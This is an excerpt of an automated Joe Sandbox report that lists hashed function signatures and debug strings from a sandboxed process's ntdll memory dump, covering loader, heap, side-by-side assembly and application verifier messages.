                                          • Not Executed
                                          control_flow_graph 63 1692c0a-1692c0f 64 1692c1f-1692c26 LdrInitializeThunk 63->64 65 1692c11-1692c18 63->65
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1fecf91d95bdea74809298139f2ccc010d16728cb6e12103d2c5f77acef9bd9a
                                          • Instruction ID: 1d4f156f512dbaf36d63852b2ed5a9ed286778f262b69b7b6014033439b5aa18
                                          • Opcode Fuzzy Hash: 1fecf91d95bdea74809298139f2ccc010d16728cb6e12103d2c5f77acef9bd9a
                                          • Instruction Fuzzy Hash: 69B09B71D015C5D6DF51E7A44E18717790477D0701F55C065D3030751F4738D5D1E675
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: b91b5d2f12ff7ac45ffe0eeb731ef9c0ba298c31be9156fecfb9f48eca8c51c4
                                          • Instruction ID: 1b774c22810c1a7708b32c0930496828e6613057ec0fed48e3ce2c409948c5df
                                          • Opcode Fuzzy Hash: b91b5d2f12ff7ac45ffe0eeb731ef9c0ba298c31be9156fecfb9f48eca8c51c4
                                          • Instruction Fuzzy Hash: 15928BB1A08342ABE721CF29CC90B6BB7E9BB84754F04492DFA95D7350D770E844CB96
                                          Strings
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016C54CE
                                          • Critical section address, xrefs: 016C5425, 016C54BC, 016C5534
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 016C5543
                                          • Thread identifier, xrefs: 016C553A
                                          • corrupted critical section, xrefs: 016C54C2
                                          • double initialized or corrupted critical section, xrefs: 016C5508
                                          • Invalid debug info address of this critical section, xrefs: 016C54B6
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016C540A, 016C5496, 016C5519
                                          • Address of the debug info found in the active list., xrefs: 016C54AE, 016C54FA
                                          • 8, xrefs: 016C52E3
                                          • Critical section address., xrefs: 016C5502
                                          • undeleted critical section in freed memory, xrefs: 016C542B
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016C54E2
                                          • Critical section debug info address, xrefs: 016C541F, 016C552E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 875e521972aaa88726621fb153a7d3883d091584d18c6da440fed69614e3b612
                                          • Instruction ID: 0df7e39340a9b763c32a5ab1d19719982279f6b567f3d8205a1057a5c439bc84
                                          • Opcode Fuzzy Hash: 875e521972aaa88726621fb153a7d3883d091584d18c6da440fed69614e3b612
                                          • Instruction Fuzzy Hash: 81819AB1A41358AFEB20CF99CC45BAEBBB9EB48B14F10421EF50AB7241D375A941CB50
                                          Strings
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 016C2624
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 016C2412
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 016C2498
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016C24C0
                                          • @, xrefs: 016C259B
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 016C2602
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016C25EB
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 016C2409
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 016C2506
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016C22E4
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 016C261F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          • Opcode ID: e70a3a344b885ee09a0b3b263e045912fe93cc5b7cf420bbe1ae9dac84f9eeb6
                                          • Instruction ID: 5ea17f9b9e9ce871c4fc392cfc1dbba39037b16ed337f2a5b3993a0da40dfdd4
                                          • Opcode Fuzzy Hash: e70a3a344b885ee09a0b3b263e045912fe93cc5b7cf420bbe1ae9dac84f9eeb6
                                          • Instruction Fuzzy Hash: FC0270F1D012299FDB71DB54CC90BAAB7B8AF54704F0041EEEA09A7241DB709E85CF69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          • Opcode ID: fe5dd515408af625955100d31a261ac6c7bbc63627fc90f9f856ffe0ebaa211f
                                          • Instruction ID: 7c69ec7bfb97f42b1e67f1705bd42e2692245eafaf910d5048e8a4df78f5bcab
                                          • Opcode Fuzzy Hash: fe5dd515408af625955100d31a261ac6c7bbc63627fc90f9f856ffe0ebaa211f
                                          • Instruction Fuzzy Hash: 8651ED716057129BD329CF198C44BABBBECEFA4340F14496DEA9983281E770D608CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: cafbec5b0cb32b6be26b70d113389475367e25caa84caaf9f9c0541a5fd733cc
                                          • Instruction ID: 6061d1d510a182db6792af488ac2ca3f853038dcaed4d533c18e7fd1c95a20a7
                                          • Opcode Fuzzy Hash: cafbec5b0cb32b6be26b70d113389475367e25caa84caaf9f9c0541a5fd733cc
                                          • Instruction Fuzzy Hash: 0ED19A35500785EFDB22DFA8C840BAAFBF2FF4A764F188059F4469B292C7759981CB14
                                          Strings
                                          • HandleTraces, xrefs: 016D8C8F
                                          • VerifierDebug, xrefs: 016D8CA5
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016D8A67
                                          • AVRF: -*- final list of providers -*- , xrefs: 016D8B8F
                                          • VerifierFlags, xrefs: 016D8C50
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016D8A3D
                                          • VerifierDlls, xrefs: 016D8CBD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 15066f160a43521f0ce648c9e67a33b327af2f37a68ca3c3a265fa7defadd4f4
                                          • Instruction ID: c8cc642730ad17ca300420210db270a74d7f491a61183b884d2f8c93ea10e235
                                          • Opcode Fuzzy Hash: 15066f160a43521f0ce648c9e67a33b327af2f37a68ca3c3a265fa7defadd4f4
                                          • Instruction Fuzzy Hash: 979145B2E49712EFD721EF68CC84B1BBBA9AB95724F05445DFA416B281C730DC01CB99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 091636d0562581445c16869955c539682d9b6433aece02cc07f5a4731b5ef0ec
                                          • Instruction ID: 5073e71abf319c92f870c2781713167de5f5c14ad91af4a0c18bc02b6c8d4cee
                                          • Opcode Fuzzy Hash: 091636d0562581445c16869955c539682d9b6433aece02cc07f5a4731b5ef0ec
                                          • Instruction Fuzzy Hash: 57914670B013159BEB25EF58DCA5BBE7BA2FF40B24F00812DE9456B781DB749841CB94
                                          Strings
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016A9A01
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016A99ED
                                          • apphelp.dll, xrefs: 01646496
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016A9A2A
                                          • minkernel\ntdll\ldrinit.c, xrefs: 016A9A11, 016A9A3A
                                          • LdrpInitShimEngine, xrefs: 016A99F4, 016A9A07, 016A9A30
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-204845295
                                          • Opcode ID: 72a2fdd0bc281998839ec8bcf5fc765b891fb4aeb9bed7d8365b6327d852fbf7
                                          • Instruction ID: b484f71fb577e0511de6c1714abf1cbae2878195e636efa391bd95dd75763baa
                                          • Opcode Fuzzy Hash: 72a2fdd0bc281998839ec8bcf5fc765b891fb4aeb9bed7d8365b6327d852fbf7
                                          • Instruction Fuzzy Hash: FE51E1712083009FD724DF24DC91A6B77E9FB84758F50491EFA8A97260DB30ED05CB96
                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 016C2165
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016C21BF
                                          • RtlGetAssemblyStorageRoot, xrefs: 016C2160, 016C219A, 016C21BA
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 016C219F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 016C2178
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 016C2180
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 33ed0f710d905954fc1f0472d21f921a5b06c39de2d0ce109b87cf1edca1f7cd
                                          • Instruction ID: fb8095a9a746026c86cfe91e8e364b3458768e7a155ae7aee28b143ab5c9879d
                                          • Opcode Fuzzy Hash: 33ed0f710d905954fc1f0472d21f921a5b06c39de2d0ce109b87cf1edca1f7cd
                                          • Instruction Fuzzy Hash: 2F31597AF4021577E721AA9A8C51F7B7A69DBE5E40F05416DFF02A7200D3709A01C2A0
                                          Strings
                                          • LdrpInitializeImportRedirection, xrefs: 016C8177, 016C81EB
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 016C81E5
                                          • minkernel\ntdll\ldrinit.c, xrefs: 0168C6C3
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 016C8181, 016C81F5
                                          • Loading import redirection DLL: '%wZ', xrefs: 016C8170
                                          • LdrpInitializeProcess, xrefs: 0168C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 33dce6764d4c46a0c64a80742e3b4dbd724546a98cb689645610fb92496d44a1
                                          • Instruction ID: 265fb5ffa78eb03372b5e4243a1bd29f241e1f59ed978b726c9160d7c7d6c7c8
                                          • Opcode Fuzzy Hash: 33dce6764d4c46a0c64a80742e3b4dbd724546a98cb689645610fb92496d44a1
                                          • Instruction Fuzzy Hash: 483104716443529FC220EB28DD45E2A7BE6EF94B24F04466CF9856B391E720EC04C7A6
                                          APIs
                                            • Part of subcall function 01692DF0: LdrInitializeThunk.NTDLL ref: 01692DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01690D74
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          • Opcode ID: 4b0f8918de87911f4e2c55afcc8c2f510537e91604d7acfa33931aa0713d0842
                                          • Instruction ID: f44efea9ab64eeb3df0ce60a63bdd77d0a126d3a82fb756962472be6a875d94d
                                          • Opcode Fuzzy Hash: 4b0f8918de87911f4e2c55afcc8c2f510537e91604d7acfa33931aa0713d0842
                                          • Instruction Fuzzy Hash: 2B4248719007159FDB21CF68CC80BAAB7F9FF44314F1445AEE989AB241E770AA85CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: 17fce8484a0571b0c2c90de807f807720e417a58bd54ad0f6f753539e451f076
                                          • Instruction ID: af2aa1ecb612ac3eacefcfab1d409076f29b867369afa204e6918784c0890f4c
                                          • Opcode Fuzzy Hash: 17fce8484a0571b0c2c90de807f807720e417a58bd54ad0f6f753539e451f076
                                          • Instruction Fuzzy Hash: DDC17D751083828FD751CF98C850B6ABBE4BF88708F048A6EFD958B351E734D94ACB56
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 01688421
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0168855E
                                          • LdrpInitializeProcess, xrefs: 01688422
                                          • @, xrefs: 01688591
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: b2bb069274679f6c132146b9ee99c7e4059979d6abacf3f4f092752783fb4b95
                                          • Instruction ID: d9412c486c5c432d21a5fc5bf2cbb0bd4695b4a44f01fb2a15154cfb859acfb1
                                          • Opcode Fuzzy Hash: b2bb069274679f6c132146b9ee99c7e4059979d6abacf3f4f092752783fb4b95
                                          • Instruction Fuzzy Hash: 0B919D71609345AFDB21EF25CC50EABBAEDFF84654F804A2EFA8593151E330D904CB66
                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 016C21DE
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016C22B6
                                          • .Local, xrefs: 016828D8
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016C21D9, 016C22B1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: df06257f08e189b03edcc3799d8db6575386f935600f819d9bc80b37d56747c6
                                          • Instruction ID: 030f72587b449e8161d4458e8631649cd9085afc9068eb06877d6d286a6bcc5c
                                          • Opcode Fuzzy Hash: df06257f08e189b03edcc3799d8db6575386f935600f819d9bc80b37d56747c6
                                          • Instruction Fuzzy Hash: 24A1BD359002299BDF24DF69CC98BA9B3B5BF58714F1542EED908A7351D730AE81CF84
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016B10AE
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 016B0FE5
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 016B1028
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 016B106B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: 841ffdfee5038ea82f8141fe304413d03a068611e7bf23a36f37bae65ccec413
                                          • Instruction ID: 77faaf1e3125043a384daa5b023179323e7a7b019b80a5ef8aa10cfca729fe3d
                                          • Opcode Fuzzy Hash: 841ffdfee5038ea82f8141fe304413d03a068611e7bf23a36f37bae65ccec413
                                          • Instruction Fuzzy Hash: 9E71EAB1944305AFCB61DF18CC80B9B7FA9AF94768F80046CFD498B286D734D589CB92
                                          Strings
                                          • apphelp.dll, xrefs: 01672462
                                          • LdrpDynamicShimModule, xrefs: 016BA998
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016BA992
                                          • minkernel\ntdll\ldrinit.c, xrefs: 016BA9A2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: 8e925fdd838116cfe39c6ffdbd262b0888224e87d7d857acae838f8723d10112
                                          • Instruction ID: e67786746d7a8537b453b3641cb402564647d06cb741916f24da5885e5712535
                                          • Opcode Fuzzy Hash: 8e925fdd838116cfe39c6ffdbd262b0888224e87d7d857acae838f8723d10112
                                          • Instruction Fuzzy Hash: B2315979A40201EBEB31EF9DCCC1AAAB7B9FB84B20F15405EF90567345C7709882CB90
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 01663255
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0166327D
                                          • HEAP: , xrefs: 01663264
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: 6e79ccde7ddae84052cfd5accd86278391e5392c16c976a5398ce9610d435534
                                          • Instruction ID: 8330ff6707519447bcb10c8447fd42d214d668ab7a3d0fe9b8be8e7d7f4e4386
                                          • Opcode Fuzzy Hash: 6e79ccde7ddae84052cfd5accd86278391e5392c16c976a5398ce9610d435534
                                          • Instruction Fuzzy Hash: 9092AA71A042499FDB25CFA8C8547AEBBF5FF48304F18806DE84AAB391D735A946CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: cb1c9cebb7d21c087b6e7e8da95c856e453ac6faf777e05cef1c6644c2afbd12
                                          • Instruction ID: a03a9c418976b644ce74e403defdc5a3e1d6ec7ca777833d599117b95c4de1bf
                                          • Opcode Fuzzy Hash: cb1c9cebb7d21c087b6e7e8da95c856e453ac6faf777e05cef1c6644c2afbd12
                                          • Instruction Fuzzy Hash: 6CF19D74601606EFEB25CF68CC94BAAB7BAFF44304F148269F5169B385D734E981CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          • Opcode ID: 5a8bc026fc0fd6e7982b1eac4a11387ea37ff5008867ea9e5f18a5a540855c77
                                          • Instruction ID: e0d4682db2d3451760f6d3182b3f943b2a878f254fa372b46d3878d117a03006
                                          • Opcode Fuzzy Hash: 5a8bc026fc0fd6e7982b1eac4a11387ea37ff5008867ea9e5f18a5a540855c77
                                          • Instruction Fuzzy Hash: 22C27B716087419FEB25CF28CC84BABBBE5AF88714F04892DF99987341E734D945CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 412f39131e03ff3b87bee405470466dc431242b20c19a2bac5c5f4dde84f84e9
                                          • Instruction ID: 79dcc30fcf85335b68131d1b425479e90c6713e34a81c956e2ec68e69a9aa347
                                          • Opcode Fuzzy Hash: 412f39131e03ff3b87bee405470466dc431242b20c19a2bac5c5f4dde84f84e9
                                          • Instruction Fuzzy Hash: B3A19C76911629ABDF31DF68CC88BEAB7B8EF44710F0041EAE909A7250D7359E84CF54
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 016BA121
                                          • Failed to allocated memory for shimmed module list, xrefs: 016BA10F
                                          • LdrpCheckModule, xrefs: 016BA117
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-161242083
                                          • Opcode ID: a7f9fae4bcbe65a5aab7323f3949ba24410b6b3846c4f86ff961bf1233ad00ed
                                          • Instruction ID: 51ae48a174a4494b3714257d68c402a36b18f80e650d7d8b88fdd70b44151fe2
                                          • Opcode Fuzzy Hash: a7f9fae4bcbe65a5aab7323f3949ba24410b6b3846c4f86ff961bf1233ad00ed
                                          • Instruction Fuzzy Hash: 2E71CE75A00205DFDB29DFA8CD81AAEB7F5FB45714F14806EE806E7311E734A982CB60
                                          Strings
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 016C82DE
                                          • minkernel\ntdll\ldrinit.c, xrefs: 016C82E8
                                          • Failed to reallocate the system dirs string !, xrefs: 016C82D7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: 18e6d7a0973fc5d7dcb3672234b4636e337a45c46fccdbf6dbb5548b113e17cc
